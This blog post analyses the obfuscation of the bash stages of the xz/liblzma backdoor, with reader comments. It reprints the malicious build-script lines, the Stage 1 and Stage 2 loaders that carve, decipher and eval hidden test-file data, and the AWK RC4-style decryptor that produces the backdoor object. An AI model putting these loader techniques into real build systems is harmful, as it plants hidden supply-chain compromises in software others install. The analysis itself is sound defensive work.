Yesterday Andres Freund emailed oss-security@ informing the community of the discovery of a backdoor in xz/liblzma, which affected OpenSSH server (huge respect for noticing and investigating this). Andres' email is an amazing summary of the whole drama, so I'll skip that. While the juiciest and most interesting part is admittedly the obfuscated binary with the backdoor, the part that caught my attention – and what this blogpost is about – is the initial part in bash and the simple-but-clever obfuscation methods used there. Note that this isn't a full description of what the bash stages do, but rather a write-up of how each stage is obfuscated and extracted.

P.S. Check the comments under this post, there are some good remarks there.

Before we begin

We have to start with a few notes.

First of all, there are two versions of xz/liblzma affected: 5.6.0 and 5.6.1. Differences between them are minor, but do exist. I'll try to cover both of these.

Secondly, the bash part is split into three (four?) stages of interest, which I have named Stage 0 (that's the start code added in m4/build-to-host.m4) to Stage 2. I'll touch on the potential "Stage 3" as well, though I don't think it has fully materialized yet.

Please also note that the obfuscated/encrypted stages and later binary backdoor are hidden in two test files: tests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma.

Stage 0

As pointed out by Andres, things start in the m4/build-to-host.m4 file. Here are the relevant pieces of code:

...

gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

...

gl_path_map='tr "\t \-_" " \t_\-"'

...

This code, which I believe is run somewhere during the build process, extracts the Stage 1 script. Here's an overview:

- Bytes from tests/files/bad-3-corrupt_lzma2.xz are read from the file and outputted to standard output / input of the next step – this chaining of steps is pretty typical throughout the whole process. After everything is read a newline (\n) is added as well.

- The second step is to run tr (translate, as in "map characters to other characters", or "substitute characters to target characters"), which basically changes selected characters (or byte values) to other characters (other byte values). Let's work through a few features and examples, as this will be important later.

The most basic use looks like this:

echo "BASH" | tr "ABCD" "1234"
21SH

What happened here is "A" being mapped to (translated to) "1", "B" to "2", and so on.

Instead of characters we can also specify ranges of characters. In our initial example we would just change "ABCD" to "A-D", and do the same with the target character set: "1-4":

echo "BASH" | tr "A-D" "1-4"
21SH

Similarly, instead of specifying characters, we can specify their ASCII codes... in octal. So "A-D" could be changed to "\101-\104", and "1-4" could become "\061-\064".

echo "BASH" | tr "\101-\104" "\061-\064"
21SH

This can also be mixed - e.g. "ABCD1-9\111-\115" would create a set of A, B, C, D, then numbers from 1 to 9, and then letters I (octal code 111), J, K, L, M (octal code 115). This is true both for the input characters set and the target character set.

Going back to the code, we have tr "\t \-_" " \t_\-", which does the following substitution in bytes streamed from the tests/files/bad-3-corrupt_lzma2.xz file:

- 0x09 (\t) is replaced with 0x20,

- 0x20 (space) is replaced with 0x09,

- 0x2d (-) is replaced with 0x5f,

- 0x5f (_) is replaced with 0x2d.

- In the last step of this stage the fixed xz byte stream is extracted with errors being ignored (the stream seems to be truncated, but that doesn't matter as the whole meaningful output has already been written out). The outcome of this is the Stage 1 script, which is promptly executed.
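To get a feel for that tr mapping, here is a small sketch that runs the same command on a made-up string. The sample text and the swap helper name are hypothetical and are not taken from the real test file. Since the mapping only swaps two pairs of bytes, applying it a second time should give back the original input.

```shell
# Hypothetical sample string, not taken from the real test file.
sample='a-b_c d'

# Same tr invocation as in build-to-host.m4: tab<->space, '-'<->'_'.
swap() { tr "\t \-_" " \t_\-"; }

swapped=$(printf '%s' "$sample" | swap)
restored=$(printf '%s' "$swapped" | swap)

# Show the swapped bytes (the space became a tab, '-' and '_' traded places).
printf '%s' "$swapped" | od -c
# Applying the same mapping again undoes it.
printf '%s\n' "$restored"
```

This assumes a tr that accepts the escaped hyphen the way the original command relies on (GNU tr does).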

By the way...

If you want to improve your binary file and protocol skills, check out the workshop I'll be running between April and June → Mastering Binary Files and Protocols: The Complete Journey

Stage 1

In Andres' email that's the bash file starting with "####Hello####", which is pretty short, so let's present it here with differences between 5.6.0 and 5.6.1 marked with black background.

####Hello####

# a few binary bytes here, but as it's a comment they are ignored

[ ! $(uname) = "Linux" ] && exit 0

[ ! $(uname) = "Linux" ] && exit 0

[ ! $(uname) = "Linux" ] && exit 0

[ ! $(uname) = "Linux" ] && exit 0

[ ! $(uname) = "Linux" ] && exit 0

eval `grep ^srcdir= config.status`

if test -f ../../config.status;then

eval `grep ^srcdir= ../../config.status`

srcdir="../../$srcdir"

fi

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

####World####

The first difference are the random bytes in the comment on the second line.

- In version 5.6.0 it's 86 F9 5A F7 2E 68 6A BC,

- and in 5.6.1 that's E5 55 89 B7 24 04 D8 17.

I'm not sure if these differences are meaningful in any way, but wanted to note it.

The check whether the script is running on Linux was added in 5.6.1, and the fact that it's repeated 5 times makes this pretty funny – was someone like "oops, forgot this last time and it caused issues, better put it in 5 times as an atonement!"?

We'll get back to the remaining differences later, but for now let's switch to Stage 2 extraction code, which is that huge export i=... line with a lot of heads. As previously, let's go step by step:

- The export i=... at the beginning is basically just a function "definition". It's being invoked in step 3 (as well as in Stage 2), so we'll get to it in a sec (also, it's simpler than it looks).

- The first actual step in the extraction process of Stage 2 is the decompression (xz -dc) of the good-large_compressed.lzma file to standard output. This, as previously, starts a chain of outputs of one step being used as inputs in the next one.

- Now we get to the i function invocation (eval $i). This function is basically a chain of head calls that either output the next N bytes, or skip (ignore) the next N bytes.

At the very beginning we have this:

(head -c +1024 >/dev/null)

The -c +1024 option there tells head to read and output only the next 1024 bytes from the incoming data stream (note that the + there is ignored, it doesn't do anything, unlike in tail). However, since the output is redirected in this case to /dev/null, what we effectively get is "skip the next 1024 bytes".

This is a good moment to note that if we look at the first 1024 bytes in the uncompressed data stream from the good-large_compressed.lzma file, it's basically the "A" character (byte 0x41) repeated 1024 times. To add a bit of foreshadowing, after the first 1024 characters there is some binary data.

The next head call looks almost identical, with a different length:

head -c +2048

Note that in this case output is not ignored – it will actually be passed to the next step as input.

And this pattern repeats: 1024 bytes are ignored, then 2048 bytes are outputted, 1024 bytes ignored, 2048 outputted... and so on until we get to the very end of the file where only 724 bytes (in 5.6.0) or 939 bytes (in 5.6.1) are outputted.



To visualize this, here's the actual input data that's processed by this set of head calls. Byte 0 is on top-left of the file; each column represents 256 bytes of the file as grayscale. Note the "empty gray" regions between the high entropy ("noisy") areas – what this part of the script does is basically just removing the empty regions and merging the regions with actual data together.

- In the next step – tail -c +31233 – the initial portion of the data is discarded (spoiler: it hides the binary backdoor, which is extracted in the next Stage, so it's not needed now). In 5.6.0 that would be the first 31264 bytes and in 5.6.1 that's 31232 (the off-by-one difference from the number in the command is because tail -c +N means "start outputting from byte N" and not "ignore the first N bytes").

- Step 5 revisits the tr command, which in this case is used as a very simple substitution cipher, with key (byte value mapping) being different in 5.6.0 and 5.6.1:

5.6.0: tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"

5.6.1: tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"

As per the previous explanation, this basically means that (for 5.6.0) a byte of value 5 will be substituted with a byte of value 0, a byte of value 6 will be substituted with a byte of value 1, and so on. In each case there are 6 ranges which map to the whole 0 - 255 (that's 377 octal) range.

- In the last step the deciphered data is decompressed (xz -F raw --lzma1 -dc) and the resulting Stage 2 is promptly executed.
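The individual tricks from the steps above can be tried out on toy data. The following is only a sketch: the tiny sizes and sample strings are made up, range_total is a hypothetical helper, and the head calls are written without the leading + (which, as noted, does nothing for head). It assumes GNU coreutils, where head -c N reads no more than N bytes from a pipe.

```shell
# 1) Skip/keep carving with head (2 and 3 stand in for 1024 and 2048).
carve='((head -c 2 >/dev/null) && head -c 3 && (head -c 2 >/dev/null) && head -c 3)'
carved=$(printf 'AAbbbAAccc' | eval "$carve")
echo "$carved"

# 2) tail -c +N starts output AT byte N, so only N-1 bytes are dropped.
tailed=$(printf 'abcdef' | tail -c +3)
echo "$tailed"

# 3) Each cipher key is six octal ranges; add up how many byte values they hold.
range_total() {
  total=0
  for r in "$@"; do
    lo=${r%-*}; hi=${r#*-}
    # A leading 0 makes the shell read the numbers as octal.
    total=$(( total + 0$hi - 0$lo + 1 ))
  done
  echo "$total"
}
cover_560=$(range_total 5-51 204-377 52-115 132-203 0-4 116-131)
cover_561=$(range_total 114-321 322-377 35-47 14-34 0-13 50-113)
echo "5.6.0 key: $cover_560 values, 5.6.1 key: $cover_561 values"

# 4) With the 5.6.0 key, bytes 5, 6, 7 decode to 0, 1, 2.
decoded=$(printf '\005\006\007' |
  tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" |
  od -An -tu1)
decoded=$(echo $decoded)   # squeeze od's padding into single spaces
echo "$decoded"
```

Adding up the range lengths only shows that each key holds 256 values in total. That the ranges do not overlap is easy to see by sorting them by their starting value.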

Stage 2

Stage 2 is the infected.txt file attached by Andres in the original email (that's the 5.6.0 version btw). There's a lot going on in this bash script, as this is where the actual compilation process modification happens.

From the perspective of obfuscation analysis, there are three interesting fragments to this script, two of which appear only in the 5.6.1 version. Let's start with them, as they are also simpler.

Stage 2 "extension" mechanism

Fragment 1:

vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null`

if test "x$vs" != "x" > /dev/null 2>&1;then

f1=`echo $vs | cut -d: -f1`

if test "x$f1" != "x" > /dev/null 2>&1;then

start=`expr $(echo $vs | cut -d: -f2) + 7`

ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null`

if test "x$ve" != "x" > /dev/null 2>&1;then

f2=`echo $ve | cut -d: -f1`

if test "x$f2" != "x" > /dev/null 2>&1;then

[ ! "x$f2" = "x$f1" ] && exit 0

[ ! -f $f1 ] && exit 0

end=`expr $(echo $ve | cut -d: -f2) - $start`

eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc`

fi

fi

fi

fi

Fragment 3:

vs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2>/dev/null`

if test "x$vs" != "x" > /dev/null 2>&1;then

f1=`echo $vs | cut -d: -f1`

if test "x$f1" != "x" > /dev/null 2>&1;then

start=`expr $(echo $vs | cut -d: -f2) + 7`

ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2>/dev/null`

if test "x$ve" != "x" > /dev/null 2>&1;then

f2=`echo $ve | cut -d: -f1`

if test "x$f2" != "x" > /dev/null 2>&1;then

[ ! "x$f2" = "x$f1" ] && exit 0

[ ! -f $f1 ] && exit 0

end=`expr $(echo $ve | cut -d: -f2) - $start`

eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc`

fi

fi

fi

fi

These two fragments are pretty much identical, so let's handle both of them at the same time. Here's what they do:

- First of all, they search (grep -broaF) the tests/files/ directory for a file containing the following byte sequences (signatures):

Fragment 1: "~!:_ W" and "|_!{ -"

Fragment 3: "jV!.^%" and "%.R.1Z"

Note that what's actually outputted by grep in this case has the following format: file_name:offset:signature. For example:

$ grep -broaF "XYZ"
testfile:9:XYZ

- If both signatures are found, the offset of each one is extracted (cut -d: -f2, which takes the 2nd field assuming : is the field delimiter). The first offset + 7 is saved as $start, and the second offset minus $start is saved as $end (so $end is really a length). Note that the script bails out unless both signatures were found in the same file.

- Once the script has the $start and $end values, it carves out that part of the file-that-had-the-first-signature:

cat $f1 | tail -c +${start} | head -c +${end}

- And what follows is first the substitution cipher (using the 5.6.0 version key from Stage 1 btw):

tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"

- and then decompressing the data for it to be promptly executed:

eval `... | xz -F raw --lzma2 -dc`
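The signature search and carving described above can be reproduced on a throwaway file. This is a sketch under assumptions: the file name, its contents and the X filler byte are made up, it reuses the Fragment 1 signatures, and it stops before the tr and xz steps. It assumes GNU grep for the -b and -o options.

```shell
# Build a hypothetical "test file": junk, start signature, payload, one filler
# byte, end signature, more junk.
tmpdir=$(mktemp -d)
printf '%s' 'junkjunk~!:_ WPAYLOADX|_!{ -trailing' > "$tmpdir/demo.bin"

# Same search as in Stage 2; grep prints file_name:offset:signature.
vs=$(grep -broaF '~!:_ W' "$tmpdir/" 2>/dev/null)
ve=$(grep -broaF '|_!{ -' "$tmpdir/" 2>/dev/null)

f1=$(echo "$vs" | cut -d: -f1)
# Offset is 0-based and the signature is 6 bytes long, so offset + 7 is the
# 1-based position of the first byte after the signature.
start=$(expr $(echo "$vs" | cut -d: -f2) + 7)
# Second offset minus $start is used as a length by head.
end=$(expr $(echo "$ve" | cut -d: -f2) - $start)

carved=$(cat "$f1" | tail -c +${start} | head -c ${end})
echo "start=$start end=$end carved=$carved"

rm -rf "$tmpdir"
```

With this arithmetic the carved length comes out one byte shorter than the gap between the two signatures, which is why the sketch puts a filler byte in front of the end signature. Whether the attacker planned for such a byte is not something the script itself reveals.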

Note that neither of the investigated TAR archives (5.6.0 and 5.6.1) contained any files with any of these signatures. This whole thing basically looks like an "extension/patching" system that would allow adding future scripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which makes sense, as modifying the "bad" and "good" test files over and over again is pretty suspicious. So the plan seemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.

Stage 2 backdoor extraction

As pointed out by Andres in the original e-mail, at some point an .o file is extracted and woven into the compilation/linking process. The following code is responsible for that (again, differences between versions are marked with black background):

N=0

W=88664

else

N=88664

W=0

fi

xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true

The differences between versions boil down to the size of the compressed-but-somewhat-mangled payload – that's 88792 in 5.6.0 and 88664 in 5.6.1 – and one value change in the AWK script, to which we'll get in a second.

As in all previous cases, the extraction process is a chain of commands, where the output of one command is the input of the next one. Furthermore, some steps are actually identical to those in Stage 1 (which makes sense, since – as I've mentioned – the binary payload resides in the previously ignored part of the "good" file data). Let's take a look:

- The first step is identical to step 2 in Stage 1 – the tests/files/good-large_compressed.lzma file is being extracted with xz.

- The second step is in turn identical to step 3 in Stage 1 – that was the "a lot of heads" "function" invocation.

- And here is where things diverge. First of all, the previous output gets mangled with the sed command:

LC_ALL=C sed "s/\(.\)/\1\n/g"

What this does is put a newline character after each byte (with the exception of the newline character itself). So what we end up with on the output is a byte-per-line situation (yes, there is a lot of mixing "text" and "binary" approaches to files in here). This is actually needed by the next step.

- The next step is an AWK script (that's a simple scripting language for text processing) which does – as mak pointed out to me – RC4...ish decryption of the input stream. Here's a prettified version of that script:

BEGIN { # Initialization part.
  FS = "\n"; # Some AWK settings.
  RS = "\n";
  ORS = "";
  m = 256;
  for(i=0;i<m;i++) {
    t[sprintf("x%c", i)] = i;
    key[i] = ((i * 7) + 5) % m; # Creating the cipher key.
  }
  i=0; # Skipping 4096 first bytes of the output PRNG stream.
  j=0; # ↑ it's a typical RC4 thing to do.
  for(l = 0; l < 4096; l++) { # 5.6.1 uses 8192 instead.
    i = (i + 1) % m;
    a = key[i];
    j = (j + a) % m;
    key[i] = key[j];
    key[j] = a;
  }
}

{ # Decryption part.
  # Getting the next byte.
  v = t["x" (NF < 1 ? RS : $1)];

  # Iterating the RC4 PRNG.
  i = (i + 1) % m;
  a = key[i];
  j = (j + a) % m;
  b = key[j];
  key[i] = b;
  key[j] = a;
  k = key[(a + b) % m];

  # As pointed out by @nugxperience, RC4 originally XORs the encrypted byte
  # with the key, but here for some reason add is used instead (might be an AWK thing).
  printf "%c", (v + k) % m
}

- After the input has been decrypted, it gets decompressed:

xz -dc --single-stream

- And then bytes from N (0) to W (~86KB) are being carved out using the same usual head tricks, and saved as liblzma_la-crc64-fast.o – which is the final binary backdoor.

((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o
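To see the additive RC4-like scheme from the AWK step in action without touching the real payload, here is a round-trip sketch. It works on decimal byte values, one per line, instead of raw bytes, so it sidesteps the sed byte-per-line step. The rc4ish function name and the "enc" direction (subtracting the keystream) are my own additions for illustration and are not part of the original script. The key setup and the 8192 warm-up rounds follow the 5.6.1 one-liner.

```shell
# rc4ish enc|dec : reads decimal byte values (one per line), prints the result.
rc4ish() {
  awk -v mode="$1" '
  BEGIN {
    m = 256
    for (i = 0; i < m; i++) c[i] = ((i * 7) + 5) % m   # initial state
    i = 0; j = 0
    for (l = 0; l < 8192; l++) {                        # warm-up (5.6.1 value)
      i = (i + 1) % m; a = c[i]; j = (j + a) % m; c[i] = c[j]; c[j] = a
    }
  }
  {
    v = $1
    i = (i + 1) % m; a = c[i]; j = (j + a) % m; b = c[j]
    c[i] = b; c[j] = a
    k = c[(a + b) % m]                                  # next keystream byte
    # dec adds the keystream like the original; enc (assumed) subtracts it.
    out = (mode == "dec") ? (v + k) % m : (v - k + m) % m
    print out
  }'
}

plain="72 105 0 255 10"    # made-up byte values
cipher=$(printf '%s\n' $plain | rc4ish enc | paste -sd ' ' -)
back=$(printf '%s\n' $cipher | rc4ish dec | paste -sd ' ' -)
echo "cipher: $cipher"
echo "back:   $back"
```

Since both directions generate the same keystream, subtracting and then adding it modulo 256 gives back the input, just as XORing twice would in regular RC4.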


Summary

Someone put a lot of effort into making this look pretty innocent and decently hidden: from binary test files used to store the payload, to file carving, substitution ciphers, and an RC4 variant implemented in AWK, all done with just standard command line tools. And all this in 3 stages of execution, and with an "extension" system to future-proof things and not have to change the binary test files again. I can't help but wonder (as, I'm sure, does the rest of our security community) – if this was found by accident, how many things still remain undiscovered?

Comments:

https://pastebin.com/5gnnL2yT

Do you think it was in order to make it look more believable as a test file, eg. to seem like it was checking if xz will correctly detect which parts are compressible and which should be left uncompressed?

One small addition.

In build-to-host.m4, the following line returns the filename bad-3-corrupt_lzma2.xz (with directories in front depending on where it's run, I didn't check that)

gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

this is, to me, the actual start of the attack.

The file bad-3-corrupt_lzma2.xz contains the strings ####Hello#### and ####World#### (second one being followed by a newline) which are matched by this pattern (the second one only because of $, to match "end of line").

It will be very interesting to see what the binary does.

for pnt: I believe the corrupted liblzma_la-crc64-fast.o may be used by sshd, and I think this allows remote code execution when used with a specific key/payload

https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

I'm very concerned that this malicious code will affect not only ssh but also other software.

Also, once you have the output of a stream cipher, it doesn’t really matter as far as security is concerned if you mix it in using addition mod 2 on the bit stream (i.e. XOR) or addition mod 256 on the byte stream. Aside from compatibility with most premade RC4 encryption routines out there, nothing is lost by the latter option. So if the author of this snippet did not want to spend the bytes on making a table-driven XOR implementation, this seems like a simple and clever solution.

E.g. IPv6 addresses

from v1

86f9::5af7:2e68:6abc

86f9:5af7::2e68:6abc

86f9:5af7:2e68::6abc

from v2

E555::89B7:2404:D817

E555:89B7::2404:D817

E555:89B7:2404::D817

Or pairs of IPv4 addresses?

134.249.90.247 and 46.104.106.188 (v1)

229.255.137.183 and 36.4.216.23 (v2)

1. "Jia Tan" has 700 commits. How many of these were genuine and when did he start committing malicious code?

2. Who is Lasse Collin? Is he also an alias of the attacker or is he a real person? He mentioned on the mailing list that he was talking to "Jia Tan" and it is surprising to me that he hasn't come forward and told us what these discussions were about, and how Jia Tan approached him at first.

3. What is the likelihood that there may be other yet-to-be-discovered backdoors for the same malicious code he added in xz?

4. Someone with this level of sophistication is perfectly capable of discovering exploitable vulnerabilities on his own, so what was even the point of going the supply chain route? Unless his target is _everyone_, but I still don't understand his motivation. It can't be financial, because his skills can net him a huge amount of money legally.

3. There is some likelihood there are other backdoors. The distributions are reverting to a version before Jia Tan started work on xz. Lasse Collin already reverted a change that disabled some sandboxing.

4. A nation state may want to target _everyone_. A Remote Command Execution vulnerability in sshd would be extremely valuable.

Jia's and Lasse's interaction and the backstory is documented pretty well here:

https://boehs.org/node/everything-i-know-about-the-xz-backdoor

Look at the opposite direction you will certainly find shame there. One man to rule them all. What just happened is historic. Probably an individual action, a human being with patience, simplicity, normality in a world of AI that walks on its head, nothing could be easier to shake.

As for the software, I hope that a new one written from scratch is already underway. You would have to be really stupid to continue using the current software after admitting to not knowing the extent of the damage.

How do you know he is a victim, maybe he is, but I don't know and I'm not interested in that because the important thing here is the software and it has been corrupted . The answer is simple and obvious, you have to eliminate this software for a new one that does the same thing. This is why I have no doubt... that the best free and open source developers have already gathered around a table to rewrite one that will do the same thing as the old one and even better.

Just one comment, 377 octal is 255 decimal. (The text says it's 256.)

Thanks, fixed!

I assume an attacker added it for controlling checksum or something about compression payload.

This remind me of such spyware #pegasus that use unknown security breach to provide spy service for governmental agencies.

So far Linux is quite "terra incognita" for spy forensic assuming someone want to definitely obfuscate its data content - and implement proper scheme. Such breach is part of an attempt to bridge such gap.

> 4. Someone with this level of sophistication is perfectly capable of discovering exploitable vulnerabilities on his own, so what was even the point of going the supply chain route? Unless his target is _everyone_, but I still don't understand his motivation. It can't be financial, because his skills can net him a huge amount of money legally.

It may be easy for you to net a huge amount of money legally using your skills, but not everyone lives in a country where such opportunities are readily available. The world is not a meritocracy, there are hugely talented people who are working for pennies.

For instance, this attack gains a lot by use of eval. Is that sort of usage actually common in this kind of build mechanism? Restricting builds to simpler tools and safer, less powerful subsets of behavior would make sense to me. I can't help think of the old Perl concept of "tainted" content - would that help here?

So much else (like obfuscated pipelines) is tied to the affordances of social-engineering in the maintainer ecosystem. That few people have a lot of attention to spare, so little things can be smuggled through a chunk at a time.

Very nice writeup, and thanks!

The step that links liblzma (generating src/liblzma/.libs/liblzma.a among others) looks like:

echo -n ''; export top_srcdir='../..'; export CC='gcc'; ...; export liblzma_la_LIBADD=''; sed rpath ../../tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2>/dev/null | /bin/sh >/dev/null 2>&1; /bin/sh ../../libtool --tag=CC --mode=link gcc -pthread [snip lots of options] -o liblzma.la -rpath [lots of object files]

the sed command reading the exploit is appended to the LTDEPS variable in the Makefile, and enters the link command through the

AM_V_CCLD makefile variable.

These utilities are meant to be atomic and fast. As the example shows, when there's a backdoor involved, computation consumption hikes (both at installation and operation) with respect to clean versions.

Any hike between versions should draw attention. Such effort could and should be organized as this particular case can be only a tip of an iceberg.

The proposed solution does not involve code analysis, just behavioral comparison. Code analysis comes later when irregularity is caught. Therefore it's economically sound and easy to implement.

I think Jia Tan is a contraction of Jia Le Tan / Tan Jia Le.

🤯🤯

thanks for the post/explanation!

Lasse declined that patch in the reply though, as needlessly complex and partly incorrect.

Even more scary are compilers

if once backdoor would have been introduced there, years ago, unnoticed (like git push -f to hide)

it could stay forever - self replicating.

Would be also interesting to get the info from github, if they have full history, what has been already hidden by push -f in the xz repo. I wonder if they are able to keep/store every "lost" commits. In such low contributed repo it could be unnoticed by other contributors.

Ah, the good ol' Reflections on Trusting Trust :)

1. GNU AWK does in fact support XOR; although portability may have been the driving concern for the author in using modular arithmetic.

2. Even though addition is equivalent to XOR over GF(2); it is invalid for any GF(256) which is what the author was attempting to do with the modulus operator.


How many critical servers expose the standard port 22 on the internet? Isn't it very easy to track which source IPs are allowed to connect to an SSH server? (Unless the attacker spoofs the source IP to match a legitimate one)

But even then is easy to check all source IPs which connect to ssh.

Keep in mind that this is clearly somebody/ies who don't suffer from corporate next-quarter syndrome nor the limited attention span of a lot of hackers: here's this nice keyed kit for you, send me (or rather: my boss, do not bother me with the trivial stuff) a list of 'discovered' servers every week and keep it going, with some random pauses, for the next year. Here's a list of IP ranges (owned by company/government X, Y and Z) we're particularly interested in, and do it all quiet like; do NOT get cocky, ya hear! Cheerio!

"easy to check all source IPs which connect to ssh". bye bye. Your attacker is hiding in the loud internet noise. They're not planning to attain Internet Armageddon by next week.

Back OT: thanks for publishing and the analysis effort, not just here. Frickin' awesome to see it happening. Most CVE's don't get published (tech analysis, etc.) at this level, which is a real pity.

And messieurs "Jia Tan", "Hans Jansen", et al are having a very bad week. Well, there's always wodka and then... on to the next crafty idea. Damn, this is some /really/ smart work from their side. :-))) Think about it: we read the post-mortem analysis in a few hours, /they/ had to come up with all this shit and make sure it worked on (almost) all systems: that's some /serious/ dev + test effort!

Obfuscation code like that doesn't get written in a day. Or a week.

Next thing: I'm very curious what the fallout of all this is going to be long(er) term; I'm a couple days late to the party and already collective stupidity is mounting in the youtube ocean and spilling over; while the original goal may have been thwarted, their benefit long-term is a (my estimate) significant drop in mutual trust in FOSS circles and their consumers/freeloaders, slowing everybody down, or even better, scared chickens reverting to exclusively using vetted closed-source in the trust chain. And all this politically right on time for the new EU CRA+PLA laws under development, jolly good! I can already see the OGs smile with glee for they know exactly how to handle that scenario; the usual suspects have been top of class in that department since before the Manhattan Project; so nice to be back treading well-known ground. The scare will be so very useful (to them).

Keep publishing.

This event should be the trigger that leads us to driving a stake through the heart of the zombie that autoconf and its ilk have become. The problem they were designed to address hasn't existed since the turn of the century. And as others have mentioned - time and again - a great many of the compatibility tests autoconf performs are for systems that are no longer in existence, and would be incapable of running today's autoconf even if they were.

The sorts of OS-release-specific customization required on modern systems can be handled by short, *simple*, shell scripts. People just need to (re-)learn how to write portable Makefiles (and code). I know it's possible, because I never stopped doing it.

I agree with @GerHobbelt that this attack has the potential to do a lot of harm to the free software community, also. Having everyone be suspicious of each other might make it a little harder for attacks like this to happen, but probably it will cause more harm than it does good, because we need to be able to trust and work with each other for these projects to stay alive. I kind of doubt that was part of the motivation of the attacker(s)—it seems a lot more likely to me that they just didn't care, which is really sad—but regardless, I think it's important that we stick by each other as free software developers and try to find more time to help and support each other.

autotools and the like have conditioned us to accept absurd and unnecessary levels of complexity where it is not needed. Part of the reason this attack worked is because the blizzard of noise emitted from the reams of m4 macros hid the shenanigans used to inject the attack.

A simple, human readable and *understandable* configuration system would have made this monkeying around much more obvious, and would likely have precluded this specific attack in the first place.

In Andres' mail it says that this line is added to the top Makefile:

sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1;

The result of that leaving out the /bin/bash IS stage 1, correct?

That executes stage 1, which in turn executes stage 2. Stage 2 IS in charge of making the modifications to the Makefile. But to get to this point the Makefile had to be modified already... no?

I've been reading by myself and I thought the resulting patched Makefile was a result of running ./configure which runs ./config.status which at the same time has malicious instructions from the M4sh macros that are used to create it. Specifically this one:

if test "x$gl_am_configmake" != "x"; then

gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'

#[...] (this is a snippet from the ./configure script)

With $gl_path_map = 'tr "\t \-_" " \t_\-"' *** $gl_localedir_prefix = xz *** and $gl_am_configmake being the corrupted ####Hello#### string before the restoration transformation that the 'tr' commands performs. So this is ALSO stage 1 only that this time it will be executed in the context of ./configure and not the Makefile) here:

#[...]

eval $gl_config_gt | $SHELL 2>/dev/null ;;

[...]

Having gl_config_gt="eval \$gl_localedir_config"

So ./configure->stage1->stage2->malicious Makefile generated.

But Makefile->stage1->stage2->Malicious Makefile that I just executed patched again????? wha

I guess it's something really stupid that I don't see. All this because I don't know anything about autotools lol.
